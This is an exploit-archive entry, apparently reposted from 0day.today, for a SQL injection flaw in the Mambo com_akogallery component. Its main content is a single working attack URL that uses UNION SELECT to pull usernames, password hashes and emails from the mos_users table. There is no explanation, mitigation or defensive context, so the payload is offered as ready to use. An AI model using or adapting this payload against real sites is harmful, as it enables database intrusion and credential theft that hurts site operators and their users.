id: 10893
date: 02/14/2010
title: Mambo com_akogallery Remote Sql Injection Vulnerability
author: Snakespc
cves: 

=======================================================
Mambo com_akogallery Remote Sql Injection Vulnerability
=======================================================

Mambo com_akogallery Remote Sql Injection Vulnerability
 
Demo:
http://server/index.php?option=com_akogallery&Itemid=91&func=detailgallerie&id=-10+UNION SELECT 1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+mos_users



#  0day.today [2023-03-22]  #